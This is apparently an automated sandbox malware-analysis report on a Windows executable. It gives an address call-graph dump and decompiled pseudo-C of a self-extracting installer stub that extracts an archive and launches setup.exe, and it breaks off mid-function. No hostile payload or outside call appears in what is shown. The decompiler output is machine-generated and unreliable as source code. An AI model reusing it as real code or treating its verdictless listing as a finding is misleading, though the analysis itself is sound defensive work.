403998 30 API calls 14081->14084 14082->14043 14083->14078 14084->14079 14087 4081f1 __EH_prolog 14086->14087 14088 403a76 30 API calls 14087->14088 14089 4081fd 14088->14089 14090 408227 14089->14090 14091 401ce1 30 API calls 14089->14091 14093 4039df 30 API calls 14090->14093 14092 408217 14091->14092 14094 401ce1 30 API calls 14092->14094 14095 408238 14093->14095 14094->14090 14095->14055 14097 4039a2 __EH_prolog 14096->14097 14098 403a76 30 API calls 14097->14098 14099 4039ad 14098->14099 14100 4039c4 14099->14100 14101 401ce1 30 API calls 14099->14101 14104 4039df 14100->14104 14101->14100 14103 4039d0 14103->14078 14107 4042ff 14104->14107 14108 4039e7 14107->14108 14109 404307 
14107->14109 14108->14103 14111 404327 14109->14111 14112 4043cb 14111->14112 14113 40433b 14111->14113 14112->14108 14114 404358 14113->14114 14123 413d3d RaiseException 14113->14123 14116 40437f 14114->14116 14124 413d3d RaiseException 14114->14124 14119 403a76 30 API calls 14116->14119 14121 4043a7 14116->14121 14118 403a9c ctype 29 API calls 14118->14112 14120 40438b 14119->14120 14120->14121 14125 413d3d RaiseException 14120->14125 14121->14118 14123->14114 14124->14116 14125->14121 14127 408299 __EH_prolog 14126->14127 14128 401ce1 30 API calls 14127->14128 14129 4082c0 14128->14129 14132 4082e8 14129->14132 14133 4082f2 __EH_prolog 14132->14133 14134 4042d6 ctype 34 API calls 14133->14134 14135 408319 14134->14135 14138 408334 14135->14138 14139 404327 30 API calls 14138->14139 14140 40834c 14139->14140 14141 4082d0 14140->14141 14142 4081e7 30 API calls 14140->14142 14141->14061 14142->14140 14144 403380 __EH_prolog 14143->14144 14145 402170 30 API calls 14144->14145 14146 40339c 14145->14146 14147 402170 30 API calls 14146->14147 14148 4033b1 14147->14148 14149 402170 30 API calls 14148->14149 14150 402f3e 14149->14150 14150->13647 14152 40311d __EH_prolog 14151->14152 14247 402ee1 14152->14247 14157 403141 14158 401d1b 30 API calls 14157->14158 14159 40314f 14158->14159 14161 403a9c ctype 29 API calls 14159->14161 14160 403158 14256 408f0a 14160->14256 14194 4031c1 14161->14194 14163 403198 14164 4042ad ctype 34 API calls 14163->14164 14165 4031a6 14164->14165 14166 4031c6 14165->14166 14167 4031ab 14165->14167 14168 401ce1 30 API calls 14166->14168 14169 401d1b 30 API calls 14167->14169 14170 4031d2 14168->14170 14169->14159 14171 405d0b 30 API calls 14170->14171 14172 4031de 14171->14172 14316 4049dd 14172->14316 14175 40322a 14177 401c80 30 API calls 14175->14177 14176 4031ea 14443 409569 14176->14443 14179 403237 14177->14179 14351 402685 14179->14351 14185 403a9c ctype 29 API calls 14187 403269 14185->14187 14358 40c231 14187->14358 14394 40bbc9 
14187->14394 14191 403284 14193 403a9c ctype 29 API calls 14191->14193 14195 40328f 14193->14195 14194->13660 14200 403494 __EH_prolog 14199->14200 14201 403a9c ctype 29 API calls 14200->14201 14202 4034aa 14201->14202 15781 40341c 14202->15781 14205 403a9c ctype 29 API calls 14206 4034cc 14205->14206 14207 403a9c ctype 29 API calls 14206->14207 14208 401581 14207->14208 14208->13194 14208->13195 14210 4034ed __EH_prolog 14209->14210 14211 402170 30 API calls 14210->14211 14212 40351f 14211->14212 14213 402170 30 API calls 14212->14213 14214 403535 14213->14214 14215 402170 30 API calls 14214->14215 14216 40354b 14215->14216 14217 402170 30 API calls 14216->14217 14218 403564 14217->14218 15791 4035a6 14218->15791 14221 402170 30 API calls 14222 403589 14221->14222 14222->13654 15810 4148be 14223->15810 14226 413243 14226->13659 14227 413248 GetLastError 14228 413252 14227->14228 14228->13659 14230 4131e9 CloseHandle 14229->14230 14232 402fd0 14229->14232 14231 4131f4 GetLastError 14230->14231 14230->14232 14231->14232 14232->13667 14234 4030a7 __EH_prolog 14233->14234 14235 401d7a 30 API calls 14234->14235 14236 4030bc 14235->14236 15840 40620b 14236->15840 14240 4030d4 14241 40602f 33 API calls 14240->14241 14242 4030df 14241->14242 15860 406049 14242->15860 14245 403a9c ctype 29 API calls 14246 4030f5 ShowWindow 14245->14246 14246->13680 14248 402170 30 API calls 14247->14248 14249 402ef5 14248->14249 14250 405841 14249->14250 14251 40584b __EH_prolog 14250->14251 14451 4055de 14251->14451 14254 40551a FindClose 14255 40313d 14254->14255 14255->14157 14255->14160 14257 408f14 __EH_prolog 14256->14257 14258 403a76 30 API calls 14257->14258 14259 408f31 14258->14259 14260 408f43 14259->14260 14573 409184 14259->14573 14262 402170 30 API calls 14260->14262 14263 408f7a 14262->14263 14264 402170 30 API calls 14263->14264 14265 408f91 14264->14265 14266 402170 30 API calls 14265->14266 14267 408fa8 14266->14267 14268 40906f 14267->14268 14492 404e76 14267->14492 
14547 408a3b 14268->14547 14273 408fd3 GetLastError 14277 403a9c ctype 29 API calls 14273->14277 14274 40900e 14278 401e3a 30 API calls 14274->14278 14275 4090a1 14279 403a9c ctype 29 API calls 14275->14279 14276 4090d5 14281 402634 30 API calls 14276->14281 14280 408fe3 14277->14280 14282 40901d 14278->14282 14284 4090a9 14279->14284 14285 403a9c ctype 29 API calls 14280->14285 14286 4090e4 14281->14286 14283 401d7a 30 API calls 14282->14283 14287 40902a 14283->14287 14288 403a9c ctype 29 API calls 14284->14288 14289 408feb 14285->14289 14290 403998 30 API calls 14286->14290 14291 403a9c ctype 29 API calls 14287->14291 14292 4090b1 14288->14292 14293 403a9c ctype 29 API calls 14289->14293 14294 4090f3 14290->14294 14296 409036 14291->14296 14297 403a9c ctype 29 API calls 14292->14297 14299 408ff3 14293->14299 14295 403a9c ctype 29 API calls 14294->14295 14305 4090ff 14295->14305 14298 401e19 30 API calls 14296->14298 14297->14299 14301 409046 14298->14301 14299->14163 14300 409135 14304 403a9c ctype 29 API calls 14300->14304 14303 401d7a 30 API calls 14301->14303 14302 402634 30 API calls 14302->14305 14306 409053 14303->14306 14307 409152 14304->14307 14305->14300 14305->14302 14308 403998 30 API calls 14305->14308 14313 403a9c ctype 29 API calls 14305->14313 14309 403a9c ctype 29 API calls 14306->14309 14310 403a9c ctype 29 API calls 14307->14310 14308->14305 14311 40905f 14309->14311 14312 40915a 14310->14312 14533 4092e9 14311->14533 14315 403a9c ctype 29 API calls 14312->14315 14313->14305 14315->14299 14317 4049e7 __EH_prolog 14316->14317 14318 401c80 30 API calls 14317->14318 14321 4049f6 14318->14321 14319 401ce1 30 API calls 14326 404a56 14319->14326 14321->14319 14332 404a38 14321->14332 14322 404a6d GetLastError 14324 404aea 14322->14324 14322->14326 14323 401d7a 30 API calls 14349 404b4e 14323->14349 14327 402ee1 30 API calls 14324->14327 14325 404bb2 14331 403a9c ctype 29 API calls 14325->14331 14326->14322 14326->14325 14341 401e3a 30 API calls 
14326->14341 14342 404b41 14326->14342 14346 401d7a 30 API calls 14326->14346 14350 403a9c ctype 29 API calls 14326->14350 15141 40499c 14326->15141 14329 404af2 14327->14329 14328 403a9c ctype 29 API calls 14333 4031e6 14328->14333 14330 405841 37 API calls 14329->14330 14335 404b01 14330->14335 14331->14332 14332->14328 14333->14175 14333->14176 14334 404b05 14337 403a9c ctype 29 API calls 14334->14337 14335->14334 14336 404b35 14335->14336 14339 403a9c ctype 29 API calls 14336->14339 14340 404b1d 14337->14340 14338 401e3a 30 API calls 14338->14349 14339->14342 14343 403a9c ctype 29 API calls 14340->14343 14341->14326 14342->14323 14345 404b25 14343->14345 14344 40499c 34 API calls 14344->14349 14347 403a9c ctype 29 API calls 14345->14347 14346->14326 14347->14333 14348 403a9c ctype 29 API calls 14348->14349 14349->14325 14349->14338 14349->14344 14349->14348 14350->14326 14352 401d7a 30 API calls 14351->14352 14353 4026ac 14352->14353 14354 401d7a 30 API calls 14353->14354 14355 4026d8 14354->14355 14356 405d0b 30 API calls 14355->14356 14357 4026df 14356->14357 14357->14185 14359 40bdf7 14358->14359 14360 40be1c 14359->14360 14361 40be78 14359->14361 14363 403a76 30 API calls 14359->14363 14372 40be5b 14359->14372 14374 40bf45 14359->14374 14380 40ca4c 62 API calls 14359->14380 14382 40c0f3 14359->14382 14383 40c059 14359->14383 14384 40c0b5 14359->14384 14387 40c156 14359->14387 15161 40c73a 14359->15161 15165 40ad19 14359->15165 15277 40c5e8 14359->15277 14362 40c380 34 API calls 14360->14362 15151 40c380 14361->15151 14364 40be3c 14362->14364 14363->14359 14372->14191 14375 40c380 34 API calls 14374->14375 14377 40bf76 14375->14377 14378 4042d6 ctype 34 API calls 14377->14378 14380->14359 14385 40c380 34 API calls 14382->14385 14388 40c380 34 API calls 14383->14388 14389 40c380 34 API calls 14384->14389 14386 40c083 14385->14386 14390 4042d6 ctype 34 API calls 14386->14390 14391 40c380 34 API calls 14387->14391 14388->14386 14389->14386 14391->14386 14405 

                              Control-flow Graph

                              C-Code - Quality: 83%
                              			_entry_(void* __ebx, void* __edi, void* __esi) {
                              				CHAR* _v8;
                              				intOrPtr* _v24;
                              				intOrPtr _v28;
                              				struct _STARTUPINFOA _v96;
                              				intOrPtr _v100;
                              				intOrPtr _v104;
                              				intOrPtr _v108;
                              				unsigned int _t15;
                              				signed int _t27;
                              				intOrPtr _t29;
                              				signed int _t35;
                              				intOrPtr _t52;
                              
                              				_t47 = __edi;
                              				_push(0xffffffff);
                              				_push(0x41b9e0);
                              				_push(E00414A2C);
                              				_push( *[fs:0x0]);
                              				 *[fs:0x0] = _t52;
                              				_push(__edi);
                              				_v28 = _t52 - 0x58;
                              				_t15 = GetVersion();
                              				 *0x4233d0 = 0;
                              				_t35 = _t15 & 0x000000ff;
                              				 *0x4233cc = _t35;
                              				 *0x4233c8 = _t35 << 8;
                              				 *0x4233c4 = _t15 >> 0x10;
                              				if(E004159F8(_t35 << 8, 1) == 0) {
                              					E00414C31(0x1c);
                              				}
                              				if(E004154BC() == 0) {
                              					E00414C31(0x10);
                              				}
                              				_v8 = 0;
                              				E00417641();
                              				 *0x425a3c = GetCommandLineA();
                              				 *0x423340 = E0041750F();
                              				E004172C2();
                              				E00417209();
                              				E00416C69();
                              				_v96.dwFlags = 0;
                              				GetStartupInfoA( &_v96);
                              				_v104 = E004171B1();
                              				_t56 = _v96.dwFlags & 0x00000001;
                              				if((_v96.dwFlags & 0x00000001) == 0) {
                              					_t27 = 0xa;
                              				} else {
                              					_t27 = _v96.wShowWindow & 0x0000ffff;
                              				}
                              				_t29 = E00401014(_t56, GetModuleHandleA(0), 0, _v104, _t27); // executed
                              				_v100 = _t29;
                              				E00416C96(_t29);
                              				_v108 =  *((intOrPtr*)( *_v24));
                              				return E00417039(_t47, _t56,  *((intOrPtr*)( *_v24)), _v24);
                              			}

                              APIs
                              • GetVersion.KERNEL32 ref: 00414B2A
                                • Part of subcall function 004159F8: HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                • Part of subcall function 004159F8: HeapDestroy.KERNEL32 ref: 00415A48
                              • GetCommandLineA.KERNEL32 ref: 00414B8A
                              • GetStartupInfoA.KERNEL32(?), ref: 00414BB5
                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00414BD8
                                • Part of subcall function 00414C31: ExitProcess.KERNEL32 ref: 00414C4E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                              • String ID:
                              • API String ID: 2057626494-0
                              • Opcode ID: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                              • Instruction ID: b13fe99396feb2249fb7197ea22bdd2eb3a8d4431b5d50e9622b99800ed9eeb5
                              • Opcode Fuzzy Hash: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                              • Instruction Fuzzy Hash: 0721D2B0A44705AFD718AFB6DC46BEE7BB8EF44714F10052FF9009A291DB3C85808A9C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 77%
                              			E004055DE(void** __ecx, void* __eflags) {
                              				signed int _t23;
                              				signed int _t25;
                              				void* _t36;
                              				void** _t51;
                              				void* _t53;
                              
                              				E00413954(E004196AC, _t53);
                              				_t51 = __ecx;
                              				_t23 = E0040551A(__ecx);
                              				if(_t23 != 0) {
                              					if( *0x423148 == 0) {
                              						E00401C80(_t53 - 0x18,  *(_t53 + 8));
                              						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
                              						_t25 = AreFileApisANSI();
                              						asm("sbb eax, eax");
                              						_push( ~_t25 + 1);
                              						 *_t51 = FindFirstFileA( *(E00403D04(_t53 - 0x24)), _t53 - 0x164);
                              						E00403A9C( *((intOrPtr*)(_t53 - 0x24)));
                              						 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
                              						E00403A9C( *((intOrPtr*)(_t53 - 0x18)));
                              						__eflags =  *_t51 - 0xffffffff;
                              						if(__eflags != 0) {
                              							E00405705(_t53 - 0x164,  *((intOrPtr*)(_t53 + 0xc)), __eflags);
                              						}
                              					} else {
                              						_t36 = FindFirstFileW( *(_t53 + 8), _t53 - 0x3b4); // executed
                              						_t61 = _t36 - 0xffffffff;
                              						 *_t51 = _t36;
                              						if(_t36 != 0xffffffff) {
                              							E004056A6(_t53 - 0x3b4,  *((intOrPtr*)(_t53 + 0xc)), _t61);
                              						}
                              					}
                              					_t23 = 0 |  *_t51 != 0xffffffff;
                              				}
                              				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
                              				return _t23;
                              			}









                              APIs
                              • __EH_prolog.LIBCMT ref: 004055E3
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              • FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                              • AreFileApisANSI.KERNEL32(?), ref: 0040563D
                              • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040565E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileFind$First$ApisCloseH_prolog
                              • String ID:
                              • API String ID: 4121580741-0
                              • Opcode ID: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                              • Instruction ID: 53571c6d670a3437f98eaf3b47711b77fa147e423a783867877babb07b55427d
                              • Opcode Fuzzy Hash: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                              • Instruction Fuzzy Hash: AB21813180050ADFCF11EF60C8459EEBB75EF00329F10476AE4A5B61E1DB399A85CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040553A(void** __ecx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
                              				struct _WIN32_FIND_DATAA _v324;
                              				void* _t8;
                              				void** _t14;
                              
                              				_t14 = __ecx;
                              				if(E0040551A(__ecx) == 0) {
                              					L2:
                              					return 0;
                              				}
                              				_t8 = FindFirstFileA(_a4,  &_v324); // executed
                              				 *_t14 = _t8;
                              				if(_t8 != 0xffffffff) {
                              					E0040557F( &_v324, _a8, __eflags);
                              					return 1;
                              				}
                              				goto L2;
                              			}







                              APIs
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              • FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                              • Instruction ID: 4d0f5172a85985fc9641596f45f8b0e99eb03685ed3a07152804d04183bf4296
                              • Opcode Fuzzy Hash: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                              • Instruction Fuzzy Hash: 5DE0923040050876CB20BF35DC019EB776AEF11398F104276F955672E5D738D9468F98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0041584A() {
                              				_Unknown_base(*)()* _t1;
                              
                              				_t1 = SetUnhandledExceptionFilter(E00415804); // executed
                              				 *0x4233b0 = _t1;
                              				return _t1;
                              			}





                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00015804), ref: 0041584F
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                              • Instruction ID: 76677b13eed7a87b3dd700732a0fedcf1c6828d453a24416ba8446ce1f8cc847
                              • Opcode Fuzzy Hash: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                              • Instruction Fuzzy Hash: 6CA022F0280300CF8B00AF20AC082C03E30F28830330000B3B80080238CF380388CA2C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE ref: 00415861
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                              • Instruction ID: 9f5714f3741d262582d91aa49c58cb07bd20065c27159592644951a243d3f8b5
                              • Opcode Fuzzy Hash: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 90%
                              			E00401014(void* __eflags, void* _a4, signed int _a7) {
                              				signed int _v5;
                              				char _v20;
                              				struct HWND__* _v24;
                              				struct HWND__* _v28;
                              				char _v32;
                              				struct HWND__* _v36;
                              				signed int _v40;
                              				signed int _v44;
                              				struct HWND__* _v48;
                              				struct HWND__* _v52;
                              				char _v56;
                              				WCHAR* _v68;
                              				struct HWND__* _v72;
                              				struct HWND__* _v76;
                              				char _v80;
                              				struct HWND__* _v84;
                              				struct HWND__* _v88;
                              				char _v92;
                              				struct HWND__* _v96;
                              				struct HWND__* _v100;
                              				char _v104;
                              				struct HWND__* _v108;
                              				struct HWND__* _v112;
                              				char _v116;
                              				CHAR* _v128;
                              				CHAR* _v140;
                              				char _v144;
                              				struct HWND__* _v148;
                              				struct HWND__* _v152;
                              				char _v156;
                              				intOrPtr _v164;
                              				char _v176;
                              				char _v188;
                              				char _v200;
                              				char _v212;
                              				char _v216;
                              				CHAR* _v228;
                              				struct _PROCESS_INFORMATION _v244;
                              				struct _STARTUPINFOA _v312;
                              				void* __ebp;
                              				char _t280;
                              				intOrPtr* _t294;
                              				void* _t297;
                              				void* _t302;
                              				signed int _t306;
                              				signed int _t308;
                              				signed int _t314;
                              				signed int _t318;
                              				signed int _t339;
                              				void* _t375;
                              				signed char _t384;
                              				signed int _t423;
                              				signed int _t436;
                              				int _t466;
                              				intOrPtr _t501;
                              				void* _t619;
                              				void* _t620;
                              				void* _t635;
                              				signed int _t636;
                              				signed int _t640;
                              				signed int _t642;
                              				void* _t643;
                              				char** _t644;
                              
                              				 *0x423144 = _a4;
                              				_t280 = E00401A51();
                              				_t635 = 3;
                              				 *0x423148 = _t280;
                              				_v156 = 0;
                              				_v152 = 0;
                              				_v148 = 0;
                              				E00402170( &_v156, _t635);
                              				_v32 = 0;
                              				_v28 = 0;
                              				_v24 = 0;
                              				E00402170( &_v32, _t635);
                              				_v80 = 0;
                              				_v76 = 0;
                              				_v72 = 0;
                              				E00402170( &_v80, _t635);
                              				_v116 = 0;
                              				_v112 = 0;
                              				_v108 = 0;
                              				E00402170( &_v116, _t635);
                              				E00401C80( &_v68, GetCommandLineW());
                              				_push( &_v32);
                              				E004038EE( &_v68,  &_v156);
                              				E00403A9C(_v68);
                              				_v104 = 0;
                              				_v100 = 0;
                              				_v96 = 0;
                              				E00402170( &_v104, _t635);
                              				_t501 =  *0x423144; // 0x400000
                              				E004045E2(_t501,  &_v104);
                              				E0040235E( &_v32);
                              				E00402323( &_v32);
                              				_a7 = 0;
                              				_t294 = E00401C80( &_v68, L"-y");
                              				E00401E3A( &_v32,  &_v20, 2);
                              				_t297 = E00403B4F( *_t294);
                              				E00403A9C(_v20);
                              				E00403A9C(_v68);
                              				_t649 = _t297;
                              				if(_t297 == 0) {
                              					_a7 = 1;
                              					E00401D7A( &_v32, E00401E19( &_v32,  &_v20, 2));
                              					E00403A9C(_v20);
                              					E0040235E( &_v32);
                              					E00402323( &_v32);
                              				}
                              				_v92 = 0;
                              				_v88 = 0;
                              				_v84 = 0;
                              				E0040243E( &_v92, _t635);
                              				_push( &_v92);
                              				_push(";!@InstallEnd@!");
                              				_t302 = E00401AF4(_v104, ";!@Install@!UTF-8!", _t649); // executed
                              				if(_t302 != 0) {
                              					E00401C80( &_v212, L".\\");
                              					_v56 = 0;
                              					_v52 = 0;
                              					_v48 = 0;
                              					E00402170( &_v56, _t635);
                              					__eflags = _v88;
                              					_v216 = 1;
                              					if(_v88 == 0) {
                              						L21:
                              						_v144 = 0;
                              						E00401ECD( &_v140);
                              						_t306 = E00405298( &_v144, _t643,  *0x420060);
                              						__eflags = _t306;
                              						if(_t306 != 0) {
                              							_push(0x1c);
                              							_t640 = E00403A76();
                              							__eflags = _t640;
                              							if(_t640 == 0) {
                              								_t636 = 0;
                              								__eflags = 0;
                              							} else {
                              								_t139 = _t640 + 8; // 0x8
                              								 *((intOrPtr*)(_t640 + 4)) = 0;
                              								E00401F0D(_t139);
                              								 *_t640 = 0x41b328;
                              								_t636 = _t640;
                              							}
                              							__eflags = _t636;
                              							if(_t636 != 0) {
                              								 *((intOrPtr*)( *_t636 + 4))(_t636);
                              							}
                              							_t308 = E00408107(_t636);
                              							__eflags = _t308;
                              							if(_t308 == 0) {
                              								E00401A03();
                              								_v5 = 0;
                              								_v44 = 0;
                              								_v40 = 0;
                              								_v36 = 0;
                              								E00402170( &_v44, 3);
                              								_push( &_v44);
                              								_push( &_v5);
                              								_push(_v216);
                              								_push( &_v200); // executed
                              								_t314 = E00402F15(_t636,  &_v104, __eflags); // executed
                              								__eflags = _t314;
                              								if(_t314 == 0) {
                              									E00403A9C(_v44);
                              									E00401ECD( &_v128);
                              									E00405033( &_v128);
                              									_t318 = SetCurrentDirectoryA(_v140); // executed
                              									__eflags = _t318;
                              									if(_t318 != 0) {
                              										__eflags = _v76;
                              										if(_v76 == 0) {
                              											__eflags = _v52;
                              											if(_v52 != 0) {
                              												L57:
                              												E00401CE1( &_v68,  &_v200);
                              												E00405D0B( &_v68);
                              												E00401C80( &_v20, L"%%T\\");
                              												E00401E56( &_v56,  &_v20,  &_v68);
                              												E00403A9C(_v20);
                              												E00403A9C(_v68);
                              												E00401C80( &_v20, L"%%T");
                              												E00401E56( &_v56,  &_v20,  &_v200);
                              												E00403A9C(_v20);
                              												__eflags = _v28;
                              												if(_v28 != 0) {
                              													E00401DB8( &_v56, 0x20);
                              													E00401DE3( &_v56,  &_v32);
                              												}
                              												_push( &_v56);
                              												_v312.cb = 0x44;
                              												_v312.lpReserved = 0;
                              												_v312.lpDesktop.cbSize = 0;
                              												_v312.lpTitle = 0;
                              												_v312.dwFlags = 0;
                              												_v312.cbReserved2 = 0;
                              												_v312.lpReserved2 = 0;
                              												E00402634( &_v188,  &_v212);
                              												E00401A18();
                              												E00403A9C(_v188);
                              												_t339 = CreateProcessA(0, _v228, 0, 0, 0, 0, 0, 0,  &_v312,  &_v244); // executed
                              												__eflags = _t339;
                              												if(_t339 != 0) {
                              													CloseHandle(_v244.hThread);
                              													_a4 = _v244.hProcess;
                              													E00403A9C(_v228);
                              													L69:
                              													__eflags = _a4;
                              													if(_a4 != 0) {
                              														WaitForSingleObject(_a4, 0xffffffff);
                              														CloseHandle(_a4);
                              													}
                              													SetCurrentDirectoryA(_v128); // executed
                              													E00403A9C(_v128);
                              													E00403A9C(_v200);
                              													__eflags = _t636;
                              													if(_t636 != 0) {
                              														 *((intOrPtr*)( *_t636 + 8))(_t636);
                              													}
                              													goto L73;
                              												} else {
                              													__eflags = _a7;
                              													if(_a7 == 0) {
                              														__eflags = 0;
                              														E00411127(0);
                              													}
                              													E00403A9C(_v228);
                              													L63:
                              													L64:
                              													SetCurrentDirectoryA(_v128);
                              													_push(_v128);
                              													L65:
                              													E00403A9C();
                              													E00403A9C(_v200);
                              													__eflags = _t636;
                              													if(_t636 != 0) {
                              														 *((intOrPtr*)( *_t636 + 8))(_t636);
                              													}
                              													E00401A2D( &_v144);
                              													E00403A9C(_v140);
                              													E00403A9C(_v56);
                              													E00403A9C(_v212);
                              													E00403A9C(_v92);
                              													E00403A9C(_v104);
                              													E00403A9C(_v116);
                              													E00403A9C(_v80);
                              													E00403A9C(_v32);
                              													E00403A9C(_v156);
                              													_t375 = 1;
                              													return _t375;
                              												}
                              											}
                              											E00401D1B( &_v56, L"setup.exe");
                              											_t384 = E0040587C( *((intOrPtr*)(E00401A18())),  &_v56, __eflags);
                              											asm("sbb al, al");
                              											_v5 =  ~_t384 + 1;
                              											E00403A9C(_v188);
                              											__eflags = _v5;
                              											if(_v5 == 0) {
                              												goto L57;
                              											}
                              											__eflags = _a7;
                              											if(_a7 == 0) {
                              												E00411093(0, L"Can not find setup.exe");
                              											}
                              											goto L64;
                              										}
                              										E00401A18();
                              										__eflags = _v28;
                              										_v312.lpDesktop.cbSize = 0x3c;
                              										_v312.lpTitle = 0x140;
                              										_v312.dwX = 0;
                              										_v312.dwY = 0;
                              										_v312.dwXSize = _v68;
                              										if(_v28 != 0) {
                              											E00401DE3( &_v116,  &_v32);
                              										}
                              										E00401A18();
                              										_v312.dwXCountChars = 0;
                              										asm("sbb eax, eax");
                              										_v312.dwYCountChars = 1;
                              										_v312.hStdError = 0;
                              										_v312.dwYSize =  ~_v40 & _v44;
                              										ShellExecuteExA( &(_v312.lpDesktop));
                              										__eflags = _v312.dwFillAttribute - 0x20;
                              										if(_v312.dwFillAttribute > 0x20) {
                              											_a4 = _v312.hStdError;
